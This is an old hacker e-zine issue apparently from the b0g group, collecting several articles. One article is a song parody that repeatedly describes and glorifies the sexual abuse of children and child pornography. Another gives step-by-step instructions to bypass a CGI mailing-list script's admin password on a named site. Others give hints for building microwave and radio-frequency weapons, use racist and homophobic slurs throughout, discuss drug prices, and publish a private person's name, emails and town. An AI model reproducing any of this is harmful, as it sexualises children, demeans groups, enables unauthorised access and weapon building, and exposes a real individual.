Owns You Prae Is A PHAG Lub, Peese, and Chixen Greese! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! ____________________________________________________________________ [ 9:. - [ I'm just Kent Browning ] [c0redump] :. ] [c0redump@r00ted.org.uk] :. ] ____________________________________________________________________ You see I'm, just Kent Browning (RLoxley version of Marshall Mathers) You know I just don't get it Last year I was RLoxley This year I'm haxs0ring boxes Now everybody wants to /msg me like I owe em somethin Heh, the fuck you want from me, 0 day kiddie pr0n? Get the fuck out of here Chorus One: Kent Browning You see I'm, just Kent Browning (Kent Browning) I'm just a regular h0, I don't know why all the fuss about me (fuss about me) Nobody ever gave a fuck before, all they did was DoS me (did was DoS me) Now everybody wanna run they mouth and try to get pr0n off me (get pr0n off me) Yo, you might see me typing, you might see me jerking You might see me cyber'ing a 13 year old girl whose has her bush shaved off in her pants with a coloured thong /msg'ing me cause she thinks she's gonna get ops in #hackphreak (grrrr, ARF ARF) Or on a tv show, with a xxx-large shirt on Drivin up the block in the car that I raped lori13f in 'Me in Lookin for little kiddies, dressed all sezcy in blue and red like I don't see what the big deal is Rape kiddies? twelve inch bigger than darkraven Pissed off, cause clocker and 'sektorgrl just missed all this Watchin all these kiddie imitations get rich off 'em and get dollars that shoulda been there's like they switched wallets And amidst all this Crist' poppin and wristwatches I had to sit back and just watch and just get nauseous and walk around with an empty bottle of Remi Martin raping kids that of a 11-year-old skinny Cartman ("God damnit!") I'm ghay and want Ricky Martin with instincts to rape N'Sync, don't get me started These fuckin brats can't hack and Britney's garbage What's this bitch retarded? Gimme back my sixteen dollars All I see is adults in magazines posing Whatever happened to leeching and c:\pr0n\kids\asian? Whatever happened to catchin a good-ol' fashioned passionate kid-raping and gettin your ass fucked and your hole widened? New Kids in my room, I think I raped them too Boy/girl nicks make me stiff And I can't wait 'til I fiddle all you kiddies in private I'ma love it.. (hahaha) The whole Undernet don't like me (uh-uh) Said some shit in #b0g to spite me (yup) Then went and ate loads just like me (hehe) A bunch of little kids wanna be just like me and run around screamin, "I got raped, yeah, by rlox" (nah nah) I think I was put here to rape the world and uNF your little 4-year-old boy or girl Plus I was put here to put fear in kiddies who say I'm their daddy and call themselves "shaven" cause they want me Accipter and clocker Claimin Detroit, when y'all live twenty miles away (fuckin punks) And I don't haxs0r, I'll /mode +b you fuckin faggots the fuck out Ask 'em about the room they was at when they snuck out after they ducked out the back when they saw me and pinged out (AHHH!) Ducked down and got packets shot at they box, blaow! Look at y'all runnin your mouth again when you ain't seen a fuckin Mile Road, South of 10 And I don't need help, from clocker, to chat up two kiddies in #teensex, who may try to /msg me with their pictures "Kiddie Fiddler," you damn right, Kiddie Fiddler I don't pay for my pr0n like you two little flaming faggots! Chorus Two: Kent Browning Cause I'm, just Kent Browning (Kent Browning) I'm not a programming h0, I'll ban your host if you talk about me (you talk about me) Come and see me in #gaydogsex alone if you feds doubt me (feds doubt me) And if you wanna packet my ass then come try your best DoS at me (your best DoS at me) Is it because you love me that y'all expect so much of me? You little groupie bitch, get off clocker, come fuck Daddy Now because of this blonde mop that's on top and this fucked up head that I've got, I've gone pop? The underground just spunned around and did a 360 Now these kids packet me and act like big bad haxs0rs "Oh, he just did some shit with lori13f, so now he thinks he's too big to do some shit with clocker and Accipiter" My fuckin old navy captain suin for ten million He must want a dollar for every kid I've been rapin' Shit, where the fuck you think I picked up the habit? All I had to do was go in my room and /msg kiddies Which is it wh0re, c:\pr0n\kids or c:\pr0n\adults? It doesn't matter your fserve sucks my ass! Talkin about I fingered my ass He's just aggravated I won't ejaculate in his ass (Uhh!) So tell me, what the hell is a navy-seal to do? For every million I make, another parent sues Family fightin and fussin over who wants to schmack me up proper All the sudden, I got 90 more pictures (Hey it's me!) A series8 and series9 which I've never seen or even bothered to look at until I got sent them from HP Now everybody's so happy and proud I'm finally allowed to step foot in my little kiddies house Hey-hey! And then to top it off, I walked to the newsstand to buy this kiddie-pr0n magazine with a food stamp Skipped to the last page, flipped right fast and what do I see? A picture of my whole c:\pr0n directory Okay, let me give you motherfuckers some help: uhh, here - SERIES 15, SERIES 15 Now your magazine shouldn't have so much trouble to sell Ahh fuck it, I'll even buy a couple myself b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! ____________________________________________________________________ [10:. - [ How NN hax0red b0g's mailing list ] [teleh0r] :. ] [teleh0r@doglover.com] :. ] ____________________________________________________________________ One day I was visiting www.b0g.org to see what stunts k-rad-bob and the rest of the crew were up to. After a bit of looking around I noticed that they used a CGI script which is called mailmachine.cgi, from Mike's World (http://www.mikesworld.net). I had done some auditing on that script some time ago, and remembered that there was a flaw which enabled anyone to post to the mailing list as the owners, without knowing the password. The script works like this: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ To send out mail you first have to log in with password which is set in the CGI script. http://localhost/cgi-bin/mailmachine.cgi?admin - and log in. If your password isn't equal to the one set in the script you will get an error message. (surprise) if ($in{'adminpass'} ne "$adminpass") {&adminerror} If it is the correct password you will be sent to a panel, and from there you are able to send mail to the subscribers - but from here on, the script will not check if you in fact have entered the password earlier on or not. So, install mailmachine on your box, set "$adminpass = gay-rad" and log in. Then save the html-source, change every occurrence of "/cgi-bin/mailmachine.cgi" to "http://www.b0g.org/cgi-bin/mailmachine.cgi" then write a mail, and press SEND and you're done. Yes it is true, only a genius can do this! So anyway, I mailed this information to K-rad-bob and Prae. A few days later I received a mail from K-rad-bob telling me that this flaw had in fact been exploited at b0g, and an "utterly horrible email" was sent out to everyone on the list. This was the e-mail "Nomen Nescio" sent out: __________________________________________________ From: MailingList@b0g.org To: k-rad-bob@b0g.org Subject: I'm g4y !#@! Date: 22. Oktober 2000 17:49 I, k-rad-bob, hereby recognize all gay people as my equal brothers. Last night I accidentally put my two fingers up my ass - and what a great feeling!#@! I immediately understood what had happened. I had at last realized the fact that I am gay!! So, from now, not ONE bad word about gay people. b0g == gay and we are proud of it! Signed, Gay-rad-b0b (I have officially changed my handle) __________________________________________________ This was not funny, k-rad-bob, he, he - but at least you got some good offers to join some top groups, like Hacking for Gays and the alike ;) Please visit http://teleh0r.cjb.net/ for a Proof of Concept exploit for this flaw, and a lot of more exciting exploits for other CGI scripts. b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! #include int main() { (void)printf("you're m0th3r\n"); Return 0; } ____________________________________________________________________ [11:. - [ Ray guns and other leet stuff ] [joe-ph33r] :. ] [gimp@b0g.org] :. ] ____________________________________________________________________ Ray guns?, (I could not think of a good title!) well sort of... HERF (High Energy Radio Frequency) guns can fire a high-powered focused radio pulse through a short distance, which depends mainly on the power and size. The have been numerous reports of the Russian Mafia and other criminal organizations to be using RF weapons to disable alarm systems in order to commit their nefarious acts without the police being alerted. Most of these have been hoax's and FUD. though Law enforcement has benefited from the use of HERF weapons, as the have been reports of police using them to end high speed chases, by disabling the electronics in the criminals car, so car will role to a halt. Though I have heard reports of people trying this experiment and being unsuccessful as neither the electronics nor the ignition systems of car engines are apparently very vulnerable to high amplitude electromagnetic pulses. But cars in close proximity (not too close though!) to a nuclear detonation have been reported to have shut of due to the powerful EMP pulse that is produced. So it works, you just need a lots of power. Public demonstrations and rumors: The was an experiment where a car was fired at by a HERF gun which resulted in the car stuttering slightly but continuing to run. Though it did effect the running of the car so a more powerful burst will most certainly stop it. Another demonstration of a HERF gun was shown, in which two computers were the test subjects. Both computers crashed and there was some slight data loss on the hard drives within. TV shows have not been slow to cash in on the 'HERF hype', as one TV show feature a so called HERF gun which was placed very close indeed to the target computer. Upon activation of the device the computer crashed, though the persons who set up the demonstration might have just used a big water pistol to destroy the target computer since it was so close. Also a live demonstration of a HERF gun was going to take place at the DefCon one year. Though the demonstration was cancelled at the last minute, reportedly due to the 'advice' of the FBI. Even more sinister applications of HERF technology have been reported though it is still hard to see which is fact and which is fiction. The applications include Murder at up to a 1km by giving the victim a artificial heart attack. Although are report that the soviets used this technique to kill goats at 1Km, though I have no idea if the reports were real or not. Here is the theory behind HERF bursts: The general idea is to set up an L-R-C circuit and destabilize it. For example, we know the change in emf (E) is related to the ke quantities (L = inductance, R = resistance, C = capacitance) by: L (d^2 I(t) / dt^2) + R (dI(t) / dt) + I(t)/ C = dE(t)/ dt Where I(t), and E(t) are time-variable Under suitable conditions it is possible to induce a voltage 'spike' which is the equivalent of a HERF burst. It is fairly well known that *all* electrical circuits containing an inductance (L) are intrinsically explosive. Thus, if such a circuit is somehow disrupted, there is an explosive release of magnetic energy, of order: W = 0.5 LI^2 Where L is the inductance (say of the inducting coil in the circuit) and I is the current. Say, for example, that L = 10 H (10 Henries) and I = 20A, then: W = 0.5 (10H) (20A)^2 = 2000 J (Joules) This is a fair amount of energy. In practical HERF circuits one would incorporate a 'double layer' say by using a capacitor across which some maximum value of voltage V(D) might be applied. As the current is made to exceed a threshold value I(D), a voltage drop V(D) occurs across the capacitor up to the current I(ex) when it explodes and disrupts the current. When switched on, the current increases at rate: dI/dt = (V(b) - R I/ L) (V(b) is intrinsic emf of circuit) Without the 'double layer' (capacitor) it reaches saturation at: I(s) = V(b)/ R If I(D) < I(s) uts rate of increase for I > I(D) is given by: dI/dt = [V(b) - V(D) - RI]/ L The current will tend towards a saturation value: I(s)' = [V(b) - V(D)]/ R If I(ex) < I(s)' the double layer will explode before saturation value is reached. The explosion will generate a high-energy radio frequency pulse. High Powered Microwave weapons (HPM) The advantage of HPM weapons is that it is very powerful and can have a very long range. The basics of HPM is that they comprise of a electrical power source, an RF generator and a antenna, for beam direction. I have found some information where a engineer (His name is Richard Boylan to give him credit for this) helped construct one such weapon: "The HPM demonstrator we built consisted of basically two sections. A so-called Marx generator, which produces a very brief, very high voltage, high current pulse, and a magnetron/antenna assembly, which converts the pulse current into an intense burst of microwave energy and then directs it towards a target. The demonstrator was housed in a trailer which had its own 15 kW diesel generator, and they used to tow it out to the desert to test it. The testing was done at the Cibola Range of the Yuma Proving Ground near Yuma, Arizona. A commercial 100 kV DC power supply was used to charge the 20-stage Marx, where it charged its capacitors in parallel, and then via a series of spark gaps discharged them in series. With the power supply set to 27 kV, the Marx would output a 265 kV, 3500 ampere, 21.4-nanosecond pulse. The spark gap array was pressurized with air, and the air pressure was regulated so as to control the point at which the Marx would fire. This allowed the system to operate over a range of output power levels. One megawatt was a typical pulse-power output, and with typical 50% magnetron efficiency, a half-megawatt RF pulse could be achieved. The negative-polarity output pulse from the Marx was coupled to a large, cold-cathode magnetron tube equipped with a super conducting magnet. The magnet was cooled to super conducting temperatures by liquid helium, and the magnetron itself was evacuated by a small vacuum pump. A specially-designed magnet power supply (1 volt, 70 amperes) was used to energize the magnet assembly. A wave guide couples the resulting microwave energy (4.4 GHz) to a 10-foot diameter dish antenna, which was mounted several feet above the trailer. Precautions were necessary around the operating equipment to protect personnel. Strong magnetic field, X-radiation from the magnetron, and RF hazard from the antenna all had to be considered. A zone of "denied occupancy" was set up in front of the antenna, which was basically a 12-degree cone which extended some 800 meters out in front of the antenna. The most intense part of the beam occupied a 6-degree angle, and in the center of the beam at a range of 30.5 meters, 9.85 watts per sq cm was developed." The results of the test he described as impressive, with the weapon totally destroying laptops, wrist watches and an army land mine at a distance of two miles. Though I have no idea if this testing was real and if the HPM weapon if build the way it is described would work, though its construction sounds about right. You must also keep in mind that this construction and testing was supposedly have taken place between 1987 and 1989, so HPM technology will have moved on considerably since then. I reckon you can probably build a decent short range microwave weapon by stealing a few bits out of some microwave ovens and adding a few extra bits, though the is still the hazard of radiation from the magnetron tube and high voltages. The first half of the weapon is a Marx generator or a variant of it, you can build one of these quite easily and the are many free example picture and circuit diagrams that you can download for free on the internet. Though you most probably the rest I have no idea though you might want to raid you're saving account. (still can you make toast from a mile away? That's what I want to know) Of course these are still high powered microwaves you are dealing with. Some warning signs that you are being exposed to high levels of microwave radiation include: 1. You feeling warm/hot. 2. You going suddenly blind (the tissue in you're eyes being destroyed) 3. Extreme pain (at high levels) 4. Death The Threat Most countries military now harden their equipment against this threat. As flux bombs I believe were used in the gulf war to knock out enemy weapons and equipment. But how long is it before terrorists get there hands on RF weapons? Probably not that long now (if not already), I can see The IRA and Basque terrorist (or political solders as they prefer to be called) as well as organized crime will probably start using these types of weapons within the next 10 years yet our governments (both British and American still do not see the need to hardening civilian critical equipment against this threat. For example what would happen if one of these weapons was used on a commercial jet, or to hose a major financial district by some terrorist or criminal organization!?! (just had to put some FUD in there to keep interesting) Shielding Shielding is relatively inexpensive these day and if you would like more information on shielding you're equipment see at article at: http://www.infowar.com called hardening you're assets, which explains ways to protect against these type of weapons as well as how to make you're computer and equipment EM-Secure (or TEMPEST hardened as it is commonly called). High energy LASER (HEL) Laser stands for 'Light Amplification by Stimulated Emission of Radiation' and everyone knows what a laser is, well unless they have been in living in a cave or something for the last 35 years. Most people have seen lasers that are used in cutting and for surgery but what most people don't know is that the US military has laser weapons powerful enough to shoot down missile and knock satellites out of orbit. the advantage of laser defenses over missile defenses is that (obviously as light travels very fast) you can't run form a laser, so as long as its targeting system is accurate it will hit the target. Currently the US army is developing the THEL (tactical high energy laser) for mobile surface to air defenses. The US military has is also developing laser weapons to blind the target (Electro optic countermeasures or EOCM), mind you, you can already do this to people driving cars with a laser pointer. Particle beam weapons Basically particle beam weapons are a bit eleet and not something you can muck around with in you're back yard. A particle beam weapon Basically fires a stream of charged protons a certain distance. The cool thing about particle beams though is that the beam can pass through other objects (mainly air usually) with it only loosing a small amount of energy, but when it finally slows down to a certain speed, the particles will start hitting the atoms in the area (in the air usually) which knocks electrons off and makes a mess, creating a area of plasma. This plasma is not that useful for much though, I don't thing it would do that much damage to a aircraft, sure it would hurt people, but a bullet would do a much better job. The only good reason for the development of this kind of weapon is for electronic counter measures as the ball of plasma would probably give a good radar return quite well and would most probably create enough heat for heat seeking missiles to be fooled by it. If you want to see a particle beam in action, pop down to Area-51 as they sometimes test them there, look out for the plasma moving around about a mile above the test area. Well that's my quick round up of some DEW (directed energy weapons), the are many other directed energy weapons being developed but most of them are too l33t for me :( ********************************************************************* DISCLAIMER: I will not be held responsible for anything you may or may not do. Oh and in most parts of the world the are laws against constructing and possessing these types of devices. I make no claims for the correctness of this information as the pentagon never answered my questions. ********************************************************************* b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! ____________________________________________________________________ [12:. - [ bananas, Hitler crew, defcon and drugs ] [tak] :. ] [tak@b0g.org] :. ] ____________________________________________________________________ OK, first thing, this article is how to eat bananas! Banana BOMBS! first you gotta go to the gheto you fagit, and ask the black doods you see if they are related to rednay king, if they say yes, then call them nigers, and walk away. If they say shit, say shit on your mom beep beep! AAH ok, OMG check it out you get a peach, banana, a pair, and a stereo. You open the stereo up, and put fruit in it, then take it to the city, on the roof, and throw it on the people wlaking on th estreet. AHAHA STUPID FAGITS. OK HERE ARE SOME b0g FREQUENTLY ASKED QUESTIONS THAT ARE NOT COVERED ON THE WEB PAGE:;;;; ____ ARE YOU GUYS GAY? | | fuck you fagit! |____|____ | | DO YOU GUYS HACK SHIT? ____| | yes you fagit ARE YOU GUYS 'ELITE?' yes, now go away you fagit WILL YOU BUTT SEX WITH ME? OMG your a fagit! WHY DO PEOPLE READ B0G? cause their not fagits liek you MY MOM TOLD ME ABOUT B0g, HOW DID SHE KNOW ABOUT IT? i fuck her you fuckign fagit OK THATS IT. NOW SOME IRC QUOTES THAT ARE REAL COOL. hack the planet fagit OMG ROFL, TAK WTF? I WAS WITH MY SISTER, AND I PUKED dood wtf? haha sex is cool i love you too! AHHAHA M()()P HEY CHECK IT OUT, Dis.org CREW is a bunch of fagits, they walk around with black clothes on, and are liek look at me, im a fat fagit! WHAT A LOSERS they ware black shirts with a blue logo thats says ____ _____ ____ |__ | | _ | | __| __| | | |_| | | |__ |____| |_____| |____| THAT SAYS 'D O C' NOW SENCE B0g IS 0day HACKER HIOTLER STYLE NINJAS WE DO THIS! we make shirts that are black, with blue righting on them that say _ | | |_|__ _____ ____ |__ | | _ | | __| __| | | |/| | | |__ |____| |_____| |____| THAT SAYS 'b 0 g' you fagit | | BUT IT LOOKS LIEK DOC, making fun of em |_| cause they are a buincha gay fagits. INTERVIEW TIME! ME, and PS [Peter Shitley] [me] Peter shitley, why does your name have hte word 'shit' in it? [ps] its Peter Shipley, goofy :) [me] don't hit on me you fagit! [ps] excuse me? [me] YOUR A FAGIT [ps] FAGIT? [me] DONT CALL ME A FAGIT YOU NIGGER! [ps] i did not call you a 'FAGIT' [me] ok shut the fuck up you fagit [me] ok then [me] at defcon 9, jefe hit you with a golf cart, HAHAHAHA [ps] YeAh He DiD! [me] WTF you fagit, please dont talk with stupid caps [me] it looks gay [ps] but im a HaCkEr [me] shut up fagit [me] did you not try and get jeffe arresated for drunk driving? [ps] he was drunk [me] i didnt ask if he was drunk you fagit [ps] yes [me] and Grand Theft Auto? [ps] he stole the golf cart from the hotel, wich is theft. [me] YOU STUPID FAGIT, GET A CLUE. [ps] please stop saying fagit, the term is 'homosexual' [me] dont call me gay you fagit [me] are you a jew? [ps] no [me] a JEWISH FAGIT? [ps] no [me] fuck you you fagit THE END AHHAHAHAaHAHA WHAT A FAGIT OK WELL HAHA BIutch im gonna like go to sleep now, i got a headache. GOTTA HAVE FAITH AAAAAAAAAAAHHHHHHHHHHHHHHHHHHHAHHAahha OK OK SOMEONE ASKED ME THIS: AHAHHA BANNNAHHHAHAHAHAHAHAHAH CAUSE IM A LEET NINJA, AND YOUR A FAGIT! AHHAHA LSOERS [Disclamer: tak is not racist, sexist, or prejudice in any way, he just lieks to offent stupid fucks] Exactly WHY b0g is elite OK, so your fucking readers are thinking what the fuck tak, your a homo, if so...that is one reason im a ninja. b0g.org is the most pimptacular place on the net with coolest people around. The name one represents deep morality, and inner peace wiht society, while infact making anyone in the b0g-path look like fucking morons. This 'brotherhoof of gimps' society is one of true onteligance, and to produce such articles of elitness takes pure skill. b0g is a place where anyone can come, and be themselves...that in itself represents pure satisfaction to the body, becoming one with the universe. now, why everyone else is not elite cDc: Cult of the Dead Cow is a bunch of flaming homosexuals. They code 'Network Administration Tools' in Visual Basic, and release them to the public, trying to make themselves look 'cool' sheesh! Last couple years at defcon, they have displayed uberly-LAME acts of...STUPIDNESS... but when your IQ equals [your weight+height+showsize DIVIDED BY ZERO] then jumping around in monkey-wear is ok. The truth is cDc makes themselves look like flaming idiots, and when people as chill as b0g come around, it makes the cDc scene look even gayer. DOC: Dis.Org Crew...what can i saw about them, other than those fags from San Francisco are infact flaming homosexuals, and they clearly admit it. DOC is run by Pete Shipley, the lead fag of the century. These guys have 0-skill, and walk around wearing treachcoats to hide their fat ass's [state of mind really, nothing can hide that shit] They liek to wear black clothes, cause the only respect they can get if from 12 year old groupies, who are afraid they will be squashed by the tub-o-lard DOC losers. __________________ $$$$$ | Scratchin my ass | $/o o\$ | Lookin gay...... | $$\ ^ /$$ /__________________/ __\#/__ / \ /\| DOC |/\ / // \\ \ \ \\_______// / \_/ \/ | | | | | | | | | _|___| |___|_ |____| |____| Attrition: Attrition has been providing mirrors of ub3rly 31337 haxt0rs for a bit now, but they associate with the losers at dis.org =\ You guys are pretty lame, but that whole 'tubthumping' non-embeded style must get all the girls. AntiOnline/AntiCode: Hi, my name is jp, im a fag. I run a ghetto server, and think im cool, cause i wear bright pink clothes. AntiCode is a exploit/tools web page, is it not? Yet the layout is a representation of a default directory listing...Yet its not, its a wannabe one, cause he thinks its cool. =\ The problem with this is you are useing lynx to bust out some shit, and what do you get? A whole clutter of SHIT and after about 3 hours of searching through stuff you don't need, you find what you do need, and you must select it 5 times to get through the shitloads of redirections, and [ads?] heh... theres alot more, but that joints to lame to talk about. HackCanada: WHAT THE FUCK? narf narf narf, hack canada likes people to call them at strange hours in the night =] ## Another reason b0g is pimped: cause we are, you homo ## that is why you are fuckign reading this you bitch!! ## most people know b0g is cool, and everyone else isnt ## [except the etards] $$$$$$$ $$$$$$$$$ $$$$$$$ $$$$$$$ $$$ #$$$ $$$$$$$ $$$ $$$ # $$$ $$$ $$$$$$$ $$$# $$$ $$$$$$$ $$$$$$$ $$$$$$$$$ $$$$$$$ ## written by tak, don't ## take out you anger on ## b0g.org any anyone ## affiliated with b0g, instead, you can write tak...root@gheymonkeysex.com b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! ____________________________________________________________________ [13:. - [ Bill Being Satan Corrections ] [wizdumb] :. ] [wizdumb@leet.org] :. ] ____________________________________________________________________ Just a few corrections for stuff said in issue 8 of b0g By Wizdumb Okay. First things first. About Bill Gates being Satan. Let me start by converting "Bill Gates III" into ASCII, as said in the article... B = B I = I L = L L = L G = G A = A T = T E = E S = S I = I I = I I = I Perhaps he meant decimal, not ASCII. Oops. :) Also, how does he get those last three III's to have a value of 1 each? Fuq gnoze. But it doesn't matter. I have a way more profound discovery. The number of Satan is in fact *not* 666, but 568. Why? s = 115 a = 97 t = 116 a = 97 n = 110 ! = 33 115 + 97 + 116 + 97 + 110 + 33 = 568 The exclamation mark, of course, is vital when reffering to any powerful deity, as anyone would know. And thus, I present you with the *true* number of Satan - 568. Now you may be thinking that I was simply going to give you a more accurate representative number for Satan and then leave you, but you are mistaken. My revelation is set to go much further than that... Let's look at the decimal value of my handle... W = 87 I = 73 Z = 90 D = 68 U = 85 M = 77 B = 66 87 + 73 + 90 + 68 + 85 + 77 + 66 = 546 568 = satan! 546 = WIZDUMB Looks fine so far, but add the decimal value of SYN (22) and... "WIZDUMB" + (SYN) == "satan!" And so, I can conclude, that given my many sins (syns?) in the past - I have become Lucifer himself - sent down to earth to devirginize children and blow up postboxes. I am the dark lord incarnated, and there is no stopping me. Sooooooo HAH! And since I (Satan, Wizdumb, whoever) am on this whole trip of correcting last months issue, let me also note a minor mishap in MagicTux's article regarding UNIX password files... OpenBSD uses Blowfish for its password file, but BSDi and FreeBSD by default do *not*. They can use DES or (much better) MD5 out-of-the-box, but won't be able to use Blowfish without a fair amount of system hacking. Next correction - In Trionix's article on smoking weed... "iii) Remember the Golden Rule kids! DON'T COUGH!!!" Totally wrong, y0. Coughing will give you away as a non-hardened weed- smoker, but will also open up areas of your lungs that aren't used normally, and thus get you more wasted than usual. :) Now time for some additions - on Wh0rde's weed article. Purple weed is *not* a myth - I have seen and smoked it. Also, here in South Africa, there is a native strain which has a hell of a lot of *brown* in it - it looks as if it was cut with tobacco, but having grown the shit myself, I *know* it aint. :) And speaking of my growing, why not check out the pictures of the crops at the commune my brother used to stay at? They'll give you a good idea of what South African weed is like... http://home.global.co.za/~satur9/dagga-01.jpg http://home.global.co.za/~satur9/dagga-02.jpg http://home.global.co.za/~satur9/dagga-03.jpg http://home.global.co.za/~satur9/dagga-04.jpg http://home.global.co.za/~satur9/dagga-05.jpg http://home.global.co.za/~satur9/dagga-06.jpg http://home.global.co.za/~satur9/dagga-07.jpg http://home.global.co.za/~satur9/dagga-08.jpg "Dagga" is Afrikaans for marijuana, and the "gg" is this horrible guttural sound that you won't find anywhere in English. If you know any German or Dutch or Flemmish or something - then pronounce it as you would in that language. If you don't speak any Germanic languages - make a sound like yer hocking a loogy - it's summing like that. The strain pictured in the above images is a "Swazi" substrain - a light, trippy, highly resinous, sweet smelling strain. Beautiful stuff. I don't know if Swazi is available in other countries, but Durban Poison (another native South African strain) seems quite popular, and with Malawi - I'm not sure. The other main difference with the weed here is price. There are two main factors that have contributed to this... 1) It grows naturally here - it aint anything special 2) It was smoked by the tribes native to our country long before us whiteys rocked up - and is to this day. Greater demand - Lower price. If you have the right contacts here in SA, you can pick up a jiffy bag full of A-Grade Swazi for R40 (about $6 or 4 pounds). You can get a bank bag of not-particularly-wonderful stuff for R10 (about $1,50 or 1 pound). There is also a huge shipment of Northern Lights imported from Amsterdam which is currently floating around here, which will cost ya R70-R100 depending on how close you are to the importers. Fuq I'm getting digressed. This is what happens when ya get me talking about weed. Okay. I'm shutting myself up right now before I hurt myself. (I have my matric finals coming up and won't be smoking weed or taking MDMA or anything for *2* months, which is gonna kill me :/) Oooh, but then again, after my finals, I'll be smoking weed again after 2 months of sobriety, when I'm used to smoking it daily - and THAT is gonna kill me. :) Aight. Later... Wizdumb mailto:wizdumb@leet.org http://www.emi.za.net <=== New e-zine on it's way soon - watch out for it http://www.mdma.za.net <=== My gay advisories and stuff - most of em at least b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! ____________________________________________________________________ [14:. - [ how to not hack hotmail ] [k-rad-bob] :. ] [k-rad-bob@b0g.org] :. ] ____________________________________________________________________ Normally when people ask me to hack someone�s hotmail account I just tell em to fux0r off. This time I decided to get even. And so the adventurous saga begins. can you help me please - SloWetKis is ABORT@ool-18bd11ee.dyn.optonline.net * JS SloWetKis on #hacktech SloWetKis using NewYork.NY.US.Undernet.Org NYC Undernet Server - www.nac.net SloWetKis End of /WHOIS list. - with what? I need to get a password for my wife to be's hot mail account I think she is cheating on me I know her address, the state she is in and her zip code can you help yes give me her docs you have made my day what must I do i need her name, address and her email address Sunalem sunalem@hotmail.com Valley stream New york, 11580 is sunalem her first name? i need full name yes last mendoza thanks whats your email? how long will this take depends hopefully just a few hours and what will I owe you nothing really consider it a favor but i need your email address do you have her social security number? Benzysl@aol.com no sorry well i should still be able to get it she is sunalem913@aol.com okay just out of curiosity, why do you think shes cheating on you? good question working late calling the office and no one answers phone hang ups I hope you can help me please it might be bad for your relationship if you do this you know yes she denies it sez its in my mind and I am going crazy she will never know of it A submarine is most effective under the water remember that hehe true I will owe you big time and never forget a favor fun huh? Now for the really fun part: From: k-rad-bob@b0g.org To: sunalem913@aol.com;sunalem@hotmail.com Subject: Dear Sunalem Date: Thu, 31 Oct 2000 17:40:32 Your future husband tried to hack your email accounts because he thinks you are cheating on him. Please read the enclosed log. b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! 